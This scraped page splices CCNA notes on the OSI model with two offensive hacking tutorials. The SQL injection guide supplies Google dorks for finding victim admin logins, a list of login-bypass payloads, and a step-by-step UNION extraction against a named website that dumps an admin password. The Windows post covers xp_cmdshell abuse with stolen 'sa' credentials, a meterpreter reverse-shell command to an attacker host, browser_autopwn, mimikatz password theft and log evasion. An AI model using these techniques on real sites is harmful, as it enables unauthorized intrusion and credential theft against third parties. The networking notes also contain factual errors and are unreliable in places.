CCNA : OSI Model 7 Layers

Application Layer

The application layer is the OSI layer that is closest to the user. This layer provides network services to the user's applications. It differs from the other layers in that it does not provide services to any other OSI layer, but only to applications outside the OSI reference model. Applications layer provide a platform to access the data of remote computer.
The application layer protocols that you should know are as follows:

• SNMP (Simple Network Management Protocol)— Communicates status and allows control of networked devices.
• TFTP (Trivial File Transfer Protocol)— Simple, lightweight file transfer.
• DNS (Domain Naming System)— Translates a website name (easy for people) to an IP address (easy for computers).
• DHCP (Dynamic Host Configuration Protocol)— Assigns IP, mask, and DNS server (plus a bunch of other stuff) to hosts.
• Telnet— Provides a remote terminal connection to manage devices to which you are not close enough to use a console cable.
• HTTP (Hypertext Transfer Protocol)— Browses web pages.
• FTP (File Transfer Protocol)— Reliably sends/retrieves all file types.
• SMTP (Simple Mail Transfer Protocol)— Sends email.
• POP3 (Post Office Protocol v.3)— Retrieves email.
• NTP (Network Time Protocol)— Synchronizes networked device clocks.

presentation layer

The presentation layer is responsible for formatting data so that application-layer protocols (and then the users) can recognize and work with it. Presentation layer format the file extensions—such as .doc, .jpg, .txt, .avi, and so on. you realize that each of these file types is formatted for use by a particular type of application. The presentation layer taking the application layer data and marking it with the formatting codes so that it can be viewed reliably when accessed later. If necessary, the presentation layer might be able to translate between multiple data formats by using a common format.

The Session Layer

The session layer establishes, manages, and terminates sessions between two communicating hosts. It provides its services to the presentation layer. The session layer also synchronizes dialogue between the presentation layers of the two hosts and manages their data exchange. For example, web servers have many users, so many communication processes are open at a given time. Therefore, keeping track of which user communicates on which path is important.

Transport Layer

The transport layer is possibly the most important layer for exam study purposes. A lot is going on here, and it is heavily tested.
The transport layer's main jobs

• It sets up and maintains a session connection between two devices.
• It can provide for the reliable or unreliable delivery of data across this connection.
• It multiplexes connections, allowing multiple applications to simultaneously send and receive data. When
• Implementing a reliable connection, sequence numbers and acknowledgments (ACKs) are used.
• Flow control (through the use of windowing or acknowledgements)
• Reliable connections (through the use of sequence numbers and Acknowledgement )

Transport layer use two protocols for sending data TCP and UDP.
TCP
TCP is connection oriented protocols. Connection-oriented transmission is said to be reliable. Thinks TCP as registry AD facility available in Indian post office. For this level of service, you have to buy extra ticket and put a bunch of extra labels on it to track where it is going and where it has been. But, you get a receipt when it is delivered, you are guaranteed delivery, and you can keep track of whether your shipment got to its destination. All of this costs you more—but it is reliable!

UDP
UDP is connection less protocols. Connection-less transmission is said to be unreliable. Now, don't get too wrapped up in the term "unreliable" this doesn't mean that the data isn't going to get there; it only means that it isn't guaranteed to get there. Think of your options when you are sending a postcard, put it in the mailbox, and chances are good that it will get where it's supposed to go—but there is no guarantee, and stuff does go missing once in a while. On the other hand, it's cheap.

Reliability

When reliability is necessary, it should cover these four items:

• recognizing lost packets and having them re-sent
• recognizing packets that arrive out of order and reordering them
• detecting duplicate packets and dropping the extra ones
• Avoiding congestion

Connection Multiplexing/Application Mapping

Transport layer assigns a unique set of numbers for each connection. These numbers are called port or socket numbers. TCP, and UDP, provide a multiplexing function for a device: This allows multiple applications to simultaneously send and receive data.
Imagine a server that performs a number of functions—for example email, web pages, FTP, and DNS. The server has a single IP address, but can perform all these different functions for all the hosts that want to connect to it. The transport layer (layer 4) uses port numbers to distinguish between different types of traffic that might be headed for the same IP address.
Port numbers are divided into ranges by the IANA. Following are the current port ranges:

Port number	descriptions
0–1023	Well-Known—For common TCP/IP functions and applications
1024–49151	Registered—For applications built by companies
49152–65535	Dynamic/Private—For dynamic connections or unregistered applications

 

 

 

 

Common TCP and UDP Port Numbers

TCP		UDP
FTP	20, 21	DNS	53
Telnet	23	DHCP	67,68
SMTP	25	TFTP	69
DNS	53	NTP	123
HTTP	80	SNMP	161
POP	110
NNTP	119
HTTPS	443

Network Layer

The network layer provides a logical topology and layer-3 addresses. Routers function at the network layer. This layer is responsible for three main functions:

• Defines logical addresses used at layer-3
• Finds paths, based on the network numbers of logical addresses, to reach destination devices
• Connects different data link types together, such as Ethernet, FDDI, Serial, and Token Ring

IP packet
Where the transport layer uses segments to transfer information between machines, the Internet layer uses datagram's. Datagram is just another word for packet.
The IP protocol is mainly responsible for these functions:

• Connectionless data delivery: best effort delivery with no data recovery capabilities
• Hierarchical logical addressing to provide for highly scalable internetworks

IP addresses are broken into two components:

• Network component Defines on what segment, in the network, a device is located
• Host component defines the specific device on a particular network segment

Two types of packets are used at the Network layer: data and route updates.
Data packets
Used to transport user data through the internetwork. Protocols used to support data traffic are called routed protocols; examples of routed protocols are IP and IPv6.
Route update packets
Used to update neighboring routers about the networks connected to all routers within the internetwork. Protocols that send route update packets are called routing protocols; examples of some common ones are RIP, RIPv2, EIGRP, and OSPF. Route update packets are used to help build and maintain routing tables on each router.

IP Classes

• Class A addresses range from 1-126: 00000001-01111111.
• Class B addresses range from 128-191: 10000000-10111111.
• Class C addresses range from 192-223: 11000000-11011111.
• Class D addresses range from 224-239: 11100000-11101111.
• Class E addresses range from 240-254:

1. 0 is reserved and represents all IP addresses;
2. 127 is a reserved address and is used for testing, like a loop back on an interface:
3. 255 is a reserved address and is used for broadcasting purposes.

Public addresses are Class A, B, and C addresses that can be used to access devices in other public networks, such as the Internet. Public IP address assign authority The Internet Assigned Numbers Authority (IANA) is ultimately responsible for handing out and managing public addresses. Normally you get public addresses directly from your ISP, which, in turn, requests them from one of five upstream address registries:

• American Registry for Internet Numbers (ARIN)
• Reseaux IP Europeans Network Coordination Center (RIPE NCC)
• Asia Pacific Registry for Internet Numbers (APNIC)
• Latin American and Caribbean Internet Address Registry (LACNIC)
• African Network Information Centre (AfriNIC)

Private IP and ISP

Private ip address can be used to configure private network. You can use private ip to build your network without paying a single rupees. But one biggest problem with private ip is that with private you can not access the internet. This is the point where ISP comes from. ISP purchase a bulk of public ip address and provide them on rent. Whatever you pay to ISP for accessing internet is actually the charge of using public ip address.


Private ip address:- Not route able in public network

• Class A: 10.0.0.0-10.255.255.255 (1 Class A network)
• Class B: 172.16.0.0-172.31.255.255 (16 Class B networks)
• Class C: 192.168.0.0-192.168.255.255 (256 Class C networks)

Protocol	Description
IP	IP of TCP/IP, featuring routable 32-bit addressing.
IPX	The equivalent of IP in Novell Netware.
ICMP	Internet Connection Management Protocol. Incorporates Ping and Traceroute, which are layer 3 link-testing utilities.
OSPF, IGRP, EIGRP, RIP, ISIS	Dynamic routing protocols that learn about remote networks and the best paths to them from other routers running the same protocol.
ARP, RARP	Address Resolution Protocol (and Reverse ARP). ARP learns what MAC address is associated with a given IP address. Reverse ARP learns an IP address given a MAC address.

Data link layer

Main functions of data link layer is

• Defining the Media Access Control (MAC) or hardware addresses
• Defining the physical or hardware topology for connections
• Defining how the network layer protocol is encapsulated in the data link layer frame
• Providing both connectionless and connection-oriented services
• Defines hardware (MAC) addresses as well as the communication process that occurs within a media.
• The first six hexadecimal digits of a MAC address form the OUI.
• MAC addresses only need to be unique in a broadcast domain,
• You can have the same MAC address in different broadcast domains (virtual LANs).

There are two specifications of Ethernet frame Ethernet II and 802
802.2 use a SAP or SNAP field to differentiate between encapsulatedlayer-3 payloads.
With a SNAP frame, the SAP fields are set to 0xAA and the type field is used to indicate the layer-3 protocol. One of the issues of the original SAP field in the 802.2 SAP frame is that even though it is eight bits (one byte) in length, only the first six bits are used for identifying upper-layer protocols, which allows up to 64 protocols.
802.2 SNAP frame support of up to 65,536 protocols
Ethernet II's Version of Ethernet

• Ethernet II does not have any sub layers, while IEEE 802.2/3 has two: LLC and MAC.
• Ethernet II has a type field instead of a length field (used in 802.3). IEEE 802.2 defines the type for IEEE Ethernet

Physical Layer

The Physical layer communicates directly with the various types of actual communication media. Different kinds of media represent these bit values in different ways. Some use audio tones, while others utilize state transitions—changes in voltage from high to low and low to high. Specific protocols are needed for each type of media to explain the proper bit patterns to be used, how data is encoded into media signals, and the various qualities of the physical media’s attachment interface.

CCNA : OSI Model

OSI Reference Model

The OSI reference model is the primary model for network communications. The early development of LANs, MANs, and WANs was confused in many ways. The early 1980s saw great increases in the number and sizes of networks. As companies realized that they could save money and gain productivity by using networking technology, they added networks and expanded existing networks as rapidly as new network technologies and products were introduced.

In 1984, the International Organization for Standardization (ISO) developed the OSI Reference Model to describe how information is transferred from one networking component to another, from the point when a user enters information using a keyboard and mouse to when that information is converted to electrical or light signals transferred along a piece of wire (or radio waves transferred through the air).

ISO developed the seven-layer model to help vendors and network administrators gain a better understanding of how data is handled and transported between networking devices, as well as to provide a guideline for the implementation of new networking standards and technologies. To assist in this process, the OSI Reference Model separates the network communication process into seven simple layers.

Dividing the network into these seven layers provides these advantages:

Reduces complexity:

It breaks network communication into smaller, simpler parts. It divides the network communication process into smaller and simpler components, thus aiding component development, design, and troubleshooting.

Standardizes interfaces:

It standardizes network components to allow multiple vendor development and support.

Facilitates modular engineering:

It allows different types of network hardware and software to communicate with each other.

Interoperability between Vendors

It allows multiple-vendor development through standardization of network components. Defines the process for connecting two layers together, promoting interoperability between vendors It Allows vendors to compartmentalize their design efforts to fit a modular design, which eases implementations and simplifies troubleshooting

Ensures interoperable technology:

It prevents changes in one layer from affecting the other layers, allowing for quicker development.

Accelerates evolution:

It provides for effective updates and improvements to individual components without affecting other components or having to rewrite the entire protocol.

Simplifies teaching and learning:

It breaks network communication into smaller components to make learning easier. Provides a teaching tool to help network administrators understand the communication process used between networking components

 

The OSI Reference Model

• The OSI reference model consists of seven layers: physical, data-link, network, transport, session, presentation, and application.
• The OSI model layers usually do not correspond exactly to the protocol stack running on an actual system.
• The data-link layer protocols often include physical layer specifications.
• The network and transport layer protocols work together to provide a cumulative end-to-end communication service.
• The functions of the session, presentation, and application layers are often combined into a single application layer protocol.

SQL Injection Example Step By Step Guide

SQL Injection Example Step By Step  Guide
Warning - This Website is only for education purposes, By reading these articles you agree that HackingBytes is not responsible in any way for any kind of damage caused by the information provided in these articles.


Introduction:
Hello every one .
I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:

Code:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

Code:

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

So your input should look like this

username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in

PART 2
Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.
Download SQLI dorks list from here : http://zyan.me/UVkJP

PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add a '

So our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'

Press enter and you get some kind of error. The errors will vary...

Our page should look like that :

After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--

If you get an error that means you should lower the number of columns .
Let's try 10.

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--

The page opened normally that means the number of columns is between 10 and 14.
We try now 11.

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--

The page opened normally too...
Let's try 12.

Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--

We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .

Our page should look like that :]

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that :]

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that :]

Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin

Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html

Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :

Code:

tbladmin

Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:

Code:

116,98,108,97,100,109,105,110

Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:

Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use  HASH detector to know what it is and decrypt online.

How to hack Windows Servers

Hacking Windows Servers  

By:Rafay

Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.

• Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
• Using meterpreter payload to get a reverse shell over the target machine.
• Using browser_autopwn. (Really...)
• Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.

If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.

You must be wondering why only "sa"?

Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.

The picture below shows the connection string containing login credentials of "sa" account.

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.

So, after getting the "sa" account, we can login remotely using HeidiSQL

HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-

xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-

xp_cmdshell 'whoami'

This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.

Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.

  

2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.

Using metasploit, generate a reverse shell payload binary.

For example-

msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.

Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)

Now it's time to execute the payload.

If everything goes right, we will get a meterpreter session over the target machine as shown below-

We can also use php, asp or other payloads.

3. Browser Autopwn-

This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.

Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.

I think it is clear by now that what I'm trying to explain ;)

We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-

iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools-

Tools like pwdump and mimikatz can crack passwords of windows users.

#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.

The following screenshot shows NTLM hashes from pwdump7:

#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.

Following picture shows plain text passwords from mimikatz:

You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.